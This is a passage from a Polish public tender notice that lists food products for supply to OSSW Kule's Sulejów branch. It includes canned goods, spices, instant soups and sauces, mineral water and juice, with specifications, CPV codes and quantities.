27	Żurek w płynie 	15891000-0	Op. jedn. butelka 0,5 l. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	l	150
28	Musztarda delikatesowa stołowa 	15871250-1	Op.jedn.380g-500g, tuba z tworzywa sztucznego. Skład: woda, gorczyca, ocet, sól. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. 	kg	150
29	Olej roślinny popularny	15411100-3	Olej uniwersalny dopuszczony do żywności, zastosowania: do smażenia, pieczenia, sosów, sałatek, surówek. Skład: Mieszanka olejów: słonecznikowy, rzepakowego, bez zapachów obcych. Op. Jedn. 0,9 - 1 l. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	l	600
30	Śliwki suszone kalifornijskie	15332410-1	Śliwki suszone bez pestek półsuche konserwowane kwasem sorbowym. Op jedn. 150 - 500g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	10
31	Rodzynki	03222115-2	Zdrowe, całe, nieuszkodzone, owalne, spłaszczone jagody o pomarszczonej powierzchni, średniej wielkości o brązowej barwie, właściwym zapachu charakterystycznym dla suszonych winogron bez zapachów obcych. Smak słodki, z charakterystycznym posmakiem, bez posmaków zgorzknienia. Masa netto 100g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	10
32	Wafelek w czekoladzie	15842220-0	Wafelek w czekoladzie op.35-45g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. 	szt.	3000
33	Rogal z nadzieniem	15820000-2	Mąka pszenna, nadzienie o smaku kakaowym ok. 23% tłuszcz roślinny, syrop glukozowy, cukier, tłuszcze roślinne, aromaty, oleje roślinne tłuszcz roślinny, syrop glukozowy, cukier, tłuszcze roślinne, aromaty, substancja konserwująca, tłuszcz roślinny, cukier, oleje roślinne. Opakownaie jedn. ok. 60g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	90
34	Paluszki solone	15820000-2	Paluszki solone w op.100g. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy. 	kg	5
35	Ananas w syropie	15332400-8	Krążki ananasa, woda, cukier; opakowanie puszka. Waga ok. 500g -600g, waga po odcieku ok. 340 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	90
36	Brzoskwinie w syropie	15332400-8	Połówki brzoskwiń w gęstym syropie (woda, cukier). Opakowanie jednostkowe - puszka. Waga ok. 800 g - 900 g, waga po odcieku ok. 470 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	60
37	Groszek konserwowy	15331462-3	Skład: groszek, woda, sól. Opakowanie jednostkowe - puszka. Waga ok. 400 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	60
38	Koncentrat buraczany	15331110-1	Koncentrat barszczu czerwonego . Skład: woda, zagęszczony sok z buraków ćwikłowych nie mniej niż 12%, cukier, sól, przyprawy. Produkt pasteryzowany. Op. Jedn. 330 - 400ml. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	l	10
39	Koncentrat pomidorowy 	15331425-2	Koncentrat pomid.30% wyprodukowany ze świeżych pomidorów, bez żadnych dodatków, bez konserwantów. Za równoważny uważa się koncentrat gęsty nie zmieniający swojej barwy i smaku . Op. Jedn. 180-500g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	200
40	Kukurydza konserwowa	15331470-2	Kukurydza konserwowa. Skład: kukurydza - ziarno, woda, cukier, sól. Op. jedn. 400-500g, po odcieku nie mniej niż 220g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	60
41	Ogórek kiszony	15331000-7	Op. jedn. 900ml. Masa netto nie mniej niż 870g, po odcieku nie mniej niż 450g. Skład: ogórki, naturalna zalewa, przyprawy . Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	100
42	Ogórek konserwowy	15331500-2	Skład: ogórki, woda, ocet spirytusowy, cukier, sól, przyprawy aromatyczno - smakowe. Op. Jedn. 900ml. Masa netto nie mniej niż 870g, po odcieku nie mniej niż 450g . Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	600
43	Papryka konserwowa	15331500-2	Skład: Papryka słodka, zalewa octowa, przyprawy. Op. jedn. 900ml. Masa netto nie mniej niż 870g. Po odcieku nie mniej niż 350g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	500
44	Pieczarki marynowane	15331135-2	Skład: pieczarki całe, cebula, marchew, woda, ocet, cukier, sól, przyprawy smakowe . Produkt pasteryzowany. Op. Jedn. nie mniej niż 880g. Masa po odcieku 550g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	80
45	Seler konserwowy łagodny	15331110-1	Seler. Skład: seler, woda, ocet, cukier, sól. Op. Jedn. nie mniej niż 370 ml. Masa netto 320g, po odcieku nie mniej niż 160g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	80
46	Dżem niskosłodzony	15332290-3	Dżemy o smakach: brzoskwiniowy, truskawkowy,wisniowy, z kawałkami owoców. Skład: owoce, cukier, substancja żelująca. Łączna zawartość cukru: nie mniej niż 36g na 100g produktu. Op. Jedn. słoik 280-330g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	450
47	Kapusta kiszona	15331000-7	Op. Jedn. folia 900g -1100g. Skład: kapusta, marchew, przyprawy. Po odcieku nie mniej niż 850g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	800
48	Chrzan tarty	15331400-1	Skład: korzeń chrzanu nie mniej niż 51%, woda, proszek jajeczny, mleko w proszku, olej roślinny, ocet spirytusowy, cukier, sól, Op. Jedn. nie mniej niż 180g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	10
49	Fasola konserwowa czerwona	15331464-7	Skład: fasola czerwona, woda, sól. Zawartość fasoli bez zalewy 55%. Opakowanie jednostkowe - puszka. Waga nie mniej niż 380 g, waga po odcieku ok. 240 g. Klasa I. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	50
50	Przecier ogórkowy	15331000-7	Skład: ogórki kwaszone przetarte, przyprawy. Produkt pasteryzowany. Op. Jedn. 320-350ml, Masa netto nie mniej niż 280g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	100
51	Szczaw konserwowy	15331000-7	Szczaw konserwowy pasteryzowany. Skład: liść szczawiu, przyprawy smakowe. Op. Jedn. 320ml -350ml. Masa netto nie mniej niż 280g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	60
52	Pasztet drobiowy	15131000-5	Op. Jedn. ok.130g. Pasztet z drobiu w foremce aluminiowej zamkniętej aluminiowym wieczkiem, poddany procesowi sterylizacji. (wyklucza się puszki i słoiki). Skład chemiczny : białko - 7,3g,Tłuszcz całkowity 17,6 g, węglowodany 5,2 g. wartość energetyczna 208 kcal. Skład: mięso drobiowe, podroby, tłuszcz , jaja, kasza manna. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	150
53	Konserwa mięsna	15131000-5	Op. Jedn. 100-135g. Konserwa mięsna w foremce aluminiowej zamknięta platynką poddana procesowi sterylizacji ( wyklucza się puszki i słoiki). Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	60
54	Przyprawa do potraw uniwersalna	15871270-7	Przyprawa warzywna do zup, potraw mięsnych i ryb. Skład: zawartość soli nie więcej niż55%, warzywa suszone nie mniej niż15%, marchew, cebula, pasternak, seler, natka pietruszki, por, substancje wzmacniające smak i zapach.; cukier pieprz czarny, ekstrakt drożdżowy. Op .jedn. 150 - 200g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	150
55	Gałka muszkatołowa	15872000-1	Gałka muszkat. mielona. Op. Jedn. 10g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	1
56	Żelatyna spożywcza	15800000-6	Żelatyna spożywcza. Op. Jedn. 30 - 50g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. 	kg	3
57	Cynamon 	15872000-1	Cynamon mielony. Barwa jasnobrązowa do brunatnej, jednolita. Zapach swoisty, intensywny, bez zapachów obcych. Smak słodko- piekący, bez posmaków obcych. Przyprawa o silnym balsamicznym zapachu oraz ostrym, korzennym, gorzkawym i zarazem słodkim smaku. Op. Jedn. 15-20g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	1
58	Delikata do ryb	15871270-7	Op. Jedn. 0,5-1kg. Składniki: sól, cebula suszona 18%, substancja wzmacniająca smak i zapach: glutaminian sodu; pieprz, natka pietruszki, koper, mąka pszenna, regulator kwasowości: kwas cytrynowy, czosnek 2,3%, olej roślinny, tymianek, imbir. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	6
59	Delikata do kurczaka	15871270-7	Op. Jedn. 0,5kg -1kg. Składniki: substancja wzmacniająca smak i zapach: glutaminian sodu, sól, mąka pszenna, papryka mielona, czosnek, natka pietruszki, rozmaryn, pieprz, oregano, tymianek, majeranek, papryka ostra, cebula suszona, cukietr, pomidory suszone, olej roślinny, barwniki: karmel amoniakalny,, ekstrakt z papryki, aromat, substancja przeciwzbrylająca: dwutlenek krzemu. Przyprawa bez konserwntów. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
60	Liść laurowy	15870000-7	Liść laurowy suszony. Op.jedn.5-10g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	1
61	Majeranek	15870000-7	Przyprawa ziołowa. Mieszanina liści i kwiatów o intensywnym, charakterystycznym zapachu i smaku. Op.jedn.7-10g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	3
62	Ocet spirytus. 10% 	15871100-5	Op. Jedn. 0,5 l . Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	l	30
63	Papryka mielona słodka	15870000-7	Papryka mielona. Barwa czerwona. Smak słodkawy lub piekący, mało wyczuwalny. Op. Jedn. 20 - 100g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	1
64	Pieprz czarny mielony	15872100-2	Pieprz czarny mielony. Przyprawa o charakterystycznym ostrym smaku, stosowana do wszelkiego rodzaju potraw mięsnych i rybnych, zup, bulionów, sosów, warzyw oraz sałatek i marynat. Op. Jedn. 5-25g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
65	Pieprz czarny cały 	15872100-2	Pieprz czarny naturalny. Przyprawa o charakterystycznym ostrym smaku, stosowana do wszelkiego rodzaju potraw mięsnych i rybnych, zup, bulionów, sosów, warzyw oraz sałatek i marynat. Op. Jedn. 5-25g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	3
66	Przyprawa do zup w płynie uniwersalna typu Winiary	15871270-7	Skład: hydrolizat białkowy, glutaminian, sól, woda, przyprawy smakowe. Op. Jedn. 1 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	200
67	Ziele angielskie 	15870000-7	Ziele angielskie - przyprawa ziołowa. Op. Jedn. 10g -20g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	5
68	Kwasek cytrynowy	15800000-6	Kwasek cytrynowy spożywczy. Kryształy sypkie, bez zlepów i grudek. Kryształy bezbarwne bez obcego zapachu. Smak kwaśny Op. jedn do 100g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	3
69	Przyprawa curry	15871270-7	Kompozycja ziół, przypraw i suszonych warzyw o charakterystycznym, pikantnym aromacie i smaku. Op. jedn 20-40g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	3
70	Sól jodowana 	15872400-5	Sól warzona, próżniowa, jodowana do celów spożywcza. Składniki: chlorek sodu (NaCl) min. 99,0 %. Substancja przeciwzbryl. E 536 do 1 mg/100g, Jodan potasu 3,9?1,3 mg/100g. Op. jedn. 1 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. 	kg	350
71	Czosnek granulowany	15871270-7	Przyprawa o charakteryst. smaku i aromacie do tłust. mięs, zup i sosów. Op. Jedn. 20-40g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	1
72	Cukier waniliowy	15830000-5	Skład: cukier, aromat waniliowy. Opakowanie jednostkowe: folia aluminiowa z nadrukiem, waga ok. 20 g. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	1
73	Syrop owocowy	15622322-7	Skład: cukier lub syrop glukozowy - fruktozowy zagęszczony sok (w zależności od smaku; np.: żurawinowy, aroniowy, malinowy, wiśniowy), woda, kwas cytrynowy, regulator kwasowości, aromat, witamina C, substancja wzbogacająca. Syrop bez konserwantów, pasteryzowany. Opakowanie jednostkowe: butelka szklana bezzwrotna o pojemności ok. 0,42 litra. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	l	30
74	Herbatniki	15821200-1	Składniki: mąka pszenna, cukier, tłuszcz roślinny utwardzony, skrobia ziemniaczana,cukier inwertowany, serwatka w proszku (z mleka), lecytyna sojowa, sól, substancje spulchniające, regulator kwasowości, aromat (wanilia). Może zawierać śladowe ilości mleka, orzechów arachidowych, laskowych i migdałów. Opakowanie jednostkowe: folia przeźroczysta z nadrukiem, waga 50 g - 100 g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	50
75	Ciastka kruche	15812100-4	Ciasteczka różne smaki i kształty. Składniki: mąka pszenna, tłuszcz roślinny utwardzony, cukier, skrobia ziemniaczana, kakao niskotłuszczowe, glukoza w proszku, żółtko jaja w proszku, czekolada, sól spożywcza, substancje spulchniające, aromat. Mogą zawierać śladowe ilości orzechów oraz tłuszcz mleczny. Opakowanie: pudełko kartonowe kolorowane z nadrukiem. Waga ok. 2 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	50
76	Sałatka szwedzka	15331500-2	Skład: ogórki, cukier, ocet, sól, ogórki frezowane, Opakowanie jednostkowe - słoik szklany. Waga ok. 900 g, waga po odcieku ok. 730 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	350
77	Sałatka wielowarzywna	15331500-2	Skład: kapusta, marchew, papryka, cebula, cukier, ocet, sól. Opakowanie jednostkowe - słoik szklany. Waga ok. 900 g, waga po odcieku ok. 730 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	350
78	Sałatka obiadowa	15331500-2	Skład: pomidor zielony, ogórek, marchew, papryka, cebula, cukier, ocet, sól. Opakowanie jednostkowe - słoik szklany. Waga ok. 900 g, waga po odcieku ok. 730 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	350
79	Kapusta czerwona konserwowa	15331500-2	Skład: kapusta czerwona szatkowana, cukier, ocet, sól. Opakowanie jednostkowe - słoik szklany. Waga ok. 900 g, waga po odcieku ok. 730 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	350
80	Sałatka z buraczków 	15331500-2 	Skład: buraki, papryka, cebula, olej, cukier, ocet, sól, przyprawy. Opakowanie jednostkowe - słoik szklany. Waga ok. 500 g, waga po odcieku ok. 450g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	300
81	Ćwikła z chrzanem	15331500-2	Skład: buraki ćwikłowe tarte, chrzan, cukier, ocet, Opakowanie jednostkowe - słoik szklany. Waga ok. 280 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	50
82	Jabłka prażone	15332140-7	Skład: jabłko - mała kostka, cukier, kwasek cytrynowy - regulator kwasowości. Opakowanie jednostkowe - słoik szklany. Waga ok. 900 g. Klasa I. Termin przydatności do spożycia powinien wynosić minimum 180 dni od daty dostawy.	kg	60
83	Grzyby suszone	15893000-4	Podgrzybek, KAPELUSZE CAŁE, zdrowe, bez zanieczyszczeń organicznych, smak i zapach charakterystyczny dla grzybów suszonych. Opakowanie jednostkowe: folia spożywcza, waga ok. 100 g. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	3
84	Galaretka	15332240-8	Galaretka o smaku truskawkowym, skład: cukier, żelatyna wieprzowa, regulator kwasowości, aromat i barwnik. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	50
85	Budyń	15550000-8	Budyń śmietankowy, skład: skrobia ziemniaczana, kukurydziana, aromat, barwnik. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.00.00-0, 15.60.00.00-4, 15.60.00.00-4, 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy  zup i sosów dla OSSW  w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Barszcz biały Knorr lub równoważny	15891400-4	Składniki: skrobia, mleko odtłuszczone w proszku, mąka żytnia (14,6%), sól, płatki ziemniaczane, boczek wieprzowy wędzony, prażony (5,5%), tłuszcz roślinny, substancje wzmacniające smak i zapach: glutaminian sodu, inozynian disodowy, guanylan disodowy, cukier, aromaty, regulator kwasowości: kwas cytrynowy, cebula prażona, ekstrakt drożdżowy suszony (w tym pszenica), majeranek, liść laurowy, pieprz. Waga do 1,40 kg. Opakowanie jednostkowe: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	kg	10
2	Sos pieczeniowy Knorr lub równoważny	15871260-4	Składniki: mąka pszenna,skrobia, sól, tłuszcz roślinny, cebula suszona, substancja wzmacniająca smak i zapach: glutaminian sodu, maltodekstryna, barwnik identyczny z naturalnym, karmel E150c, cukier, papryka, czosnek, aromaty, sok z buraków suszony, pieprz, liść laurowy, ekstrakt drożdżowy suszony (w tym gluten), sos sojowy suszony (w tym pszenica). Masa netto do 2k g. Opakowanie:pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	5
3	Sos grzybowy Knorr lub równoważny	15871260-4	Składniki: tłuszcz roślinny, mąka pszenna, skrobia modyfikowana, maltodekstryna, laktoza, sól, pieczarki suszone 4,50%, aromaty, ekstrakt grzybowy suszony (pieczarka, borowik) 2,80%, substancja wzmacniająca smak i zapach: glutaminian sodu, borowiki suszone 1,60%, białko mleka, ekstrakt drożdżowy suszony, barwnik: karmel E150c, sos sojowy suszony (w tym pszenica). Masa netto do 1,10 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	5
4	Sos z zielonym pieprzem Knorr lub równoważny	15871260-4	Składniki: zasmażka (mąka pszenna, tłuszcz roślinny, barwnik, karmel E150c), skrobia modyfikowana, sól, tłuszcz roślinny, substancje wzmacniające smak i zapach: glutaminian sodu, guanylan disodowy i inozynian disodowy, aromaty (w tym sezam), ekstrakt drożdżowy suszony, cukier, pieprz zielony CAŁY liofilizowany 1,60%, pieprz, maltodekstryna, sos sojowy suszony (w tym pszenica), czosnek, barwnik karmel E150c, majeranek. Masa netto do 1,20 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	8
5	Sos do makaronu Carbonara Knorr  lub równoważny	15871260-4	Składniki: śmietanka w proszku, zasmażka, ser w proszku, skrobia, maltodekstryna, , boczek wędzony wieprzowy, żółtko jaja kurzego w proszku, aromaty, ekstrakty drożdżowe, , tłuszcz roślinny, sól, serwatka, cukier, czosnek, natka pietruszki, drożdże wędzone, kurkuma, aromat dymu wędzarniczego. Masa netto do 1,20 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	15
6	Sos do makaronu Bolognese Knorr lub równoważny	15871260-4	Składniki: koncentrat pomidorowy, tłuszcz roślinny, mąka ryżowa, maltodekstryna, cukier, cebula, sól jodowana, skrobia modyfikowana, ekstrakty drożdżowe, czosnek, syrop karmelowy, papryka czerwona, skrobia, tymianek, rozmaryn, oregano, majeranek, aromaty. Masa netto do 1,20 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	20
7	Bulion grzybowy	15891500-5	Bulion grzybowy w kostkach 10g; składniki: sól, tłuszcz roślinny utwardzony, aromaty, olej roślinny, substancje wzmacniające smak i zapach (glutaminian sodu, E 635), ekstrakt drożdżowy, maltodekstryna, suszone warzywa (cebula, marchew), cukier, przyprawy, ekstrakt grzybów suszonych (0,50%), grzyby suszone (0,10%), koncentrat czosnku, regulator kwasowości: kwas cytrynowy, gluten, seler, barwnik E 150c. Może zawierać śladowe ilości soi. Opakowanie jednostkowe: pudełko kartonowe do 0,200 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	2
8	Bulion drobiowy Knorr lub równoważny	15891500-5	Bulion drobiowy w kostkach 10g; składniki: sól, tłuszcz roślinny utwardzony, aromaty, olej roślinny, substancje wzmacniające smak i zapach (glutaminian sodu, E 635), ekstrakt drożdżowy, maltodekstryna, suszone warzywa (cebula, marchew), cukier, przyprawy, ekstrakt mięsa drobiowego (0,50%), mięso drobiowe suszone (0,10%), koncentrat czosnku, regulator kwasowości: kwas cytrynowy, gluten, seler, barwnik E 150c. Może zawierać śladowe ilości soi. Opakowanie jednostkowe: pudełko kartonowe do 0,200 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
9	Bulion wołowy Knorr lub równoważny	15891500-5	Bulion wołowy w kostkach 10g; składniki: sól, tłuszcz roślinny utwardzony, aromaty, olej roślinny, substancje wzmacniające smak i zapach (glutaminian sodu, E 635), ekstrakt drożdżowy, maltodekstryna, suszone warzywa (cebula, marchew), cukier, przyprawy, ekstrakt mięsa drobiowego (0,50%), mięso wołowe suszone (0,10%), koncentrat czosnku, regulator kwasowości: kwas cytrynowy, gluten, seler, barwnik E 150c. Może zawierać śladowe ilości soi. Opakowanie jednostkowe: pudełko kartonowe do 0,200 kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
10	Sosy sałatkowe Knorr lub równoważne	15871200-6	Składniki:laktoza, sól, cukier, regulatory kwasowości (kwas cytrynowy, dioctan sodu), substancja wzmacniająca smak i zapach (glutaminian sodu), skrobia modyfikowana, natka pietruszki, gorczyca, szczypiorek, cebula, olej roślinny, ekstrakt drożdżowy, pieprz, kurkuma, czosnek, aromaty. Masa netto do 1,20 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	15
11	Sosy deserowe Carte d or  lub równoważne	15871260-4	Składniki: syrop glukozowy, cukier, woda, regulator kwasowości, substancja konserwująca, aromaty, dodatki smakowe. Masa netto do 1,20 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	15
12	Zupa pieczarkowa Knorr lub równoważna	15891400-4	Składniki: mąka pszenna, tłuszcz roślinny, skrobia, maltodekstryna, laktoza, sól, białka mleka, ekstrakt grzybowy, pieczarki suszone, substancje wzmacniające smak i zapach, maślaki, cebula, ekstrakt z pieczarek suszonych, aromaty, natka pietruszki, pieprz czarny. Masa netto do 3 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	15
13	Zupa porowa Knorr lub równoważna	15891400-4	Składniki: mąka pszenna, tłuszcz roślinny, sół, skrobia, por suszony, substancja wzmacniająca smak i zapach, cebula suszona, stabilizator, czosnek, aromat, laktoza, białka mleka, gałka muszkatołowa, kurkuma. Masa netto do 3 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	15
14	Zupa brokułowa  Knorr lub równoważna	15891400-4	Składniki:Mąka pszenna, sół, tłuszcz roślinny, laktoza, maltodekstryna, brokuły, substancje wzmacniające smak i zapach, białka mleka, cukier, aromaty, cebula, ekstrakt drożdżowy, pieprz, kurkuma, gałka muszkatołowa. Masa netto do 1,40 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	15
15	Zupa cebulowa  Knorr lub równoważna	15891400-4	Składniki: mąka pszenna, tłuszcz roślinny, sół, skrobia, substancja wzmacniająca smak i zapach, cebula suszona, stabilizator, czosnek, aromat, laktoza, białka mleka, gałka muszkatołowa, kurkuma. Masa netto do 1,4 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
16	Krem z borowików Knorr  lub równoważna	15891400-4	Składniki: mąka pszenna, tłuszcz roślinny, skrobia, maltodekstryna, laktoza, sól, białka mleka, ekstrakt grzybowy, borowiki, substancje wzmacniające smak i zapach, maślaki, cebula, ekstrakty drożdżowe, aromaty, natka pietruszki, pieprz czarny. Masa netto do 1,40 kg. Opakowanie: pojemnik z tworzywa sztucznego. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.14.00-4, 15.87.12.60-4, 15.89.15.00-5, 15.87.12.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy wody i soków  dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Naturalna woda mineralna niegazowana  gazowana 0,50 litra	15981000-8	Naturalna woda mineralna nasycona lub nienasycona dwutlenkiem węgla spełniające wymagania Ministra Zdrowia. Barwa - bezbarwny płyn, klarowny, bez osadów i innych zanieczyszczeń. Smak i zapach - bez obcych posmaków, bezwonna. Woda pochodząca z udokumentowanych zasobów podziemnych o naturalnym stabilnym składzie mineralnym izolowanym nakładem geologicznym chroniącym zasób od zanieczyszczeń z monitorowanych ujęć. Opakowanie jednostkowe: butelki z tworzywa sztucznego typu PET 0,50 litra. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	litr	800
2	Naturalna woda mineralna niegazowana gazowana 1,50 litra	15981000-8	Naturalna woda mineralna nasycona lub nienasycona dwutlenkiem węgla spełniające wymagania Ministra Zdrowia. Barwa - bezbarwny płyn, klarowny, bez osadów i innych zanieczyszczeń. Smak i zapach - bez obcych posmaków, bezwonna. Woda pochodząca z udokumentowanych zasobów podziemnych o naturalnym stabilnym składzie mineralnym izolowanym nakładem geologicznym chroniącym zasób od zanieczyszczeń z monitorowanych ujęć. Opakowanie jednostkowe: butelki z tworzywa sztucznego typu PET 1,50 litra. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	litr	2000
3	Naturalna woda mineralna niegazowana 5 litrów	15981000-8	Naturalna woda mineralna nie nasycona dwutlenkiem węgla spełniające wymagania Ministra Zdrowia. Barwa - bezbarwny płyn, klarowny, bez osadów i innych zanieczyszczeń. Smak i zapach - bez obcych posmaków, bezwonna. Woda pochodząca z udokumentowanych zasobów podziemnych o naturalnym stabilnym składzie mineralnym izolowanym nakładem geologicznym chroniącym zasób od zanieczyszczeń z monitorowanych ujęć. Opakowanie jednostkowe: butelki z tworzywa sztucznego typu PET 5 litrów. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy	litr	3000
4	Sok owocowy 200 ml	15982100-6	Sok owocowy pomarańczowy, jabłkowy, z czarnej porzeczki, produkowany z soku owoców lub zagęszczonego soku owocowego zawierający naturalne składniki smakowo-aromatyczne, niegazowany, zdolny do fermentacji, lecz niesfermentowany, otrzymany przez dodanie wody i miodu. Konsystencja płynna, zawartość ekstraktu nie mniej niż 10%. Barwa charakterystyczna dla użytych składników, klarowna, bez osadów i innych zanieczyszczeń. Smak i zapach charakterystyczny dla owoców. Kartonik 0,20 litra z przyklejoną słomką. Termin przydatności do spożycia nie mniej niż 180 dni od daty dostawy.	litr	400
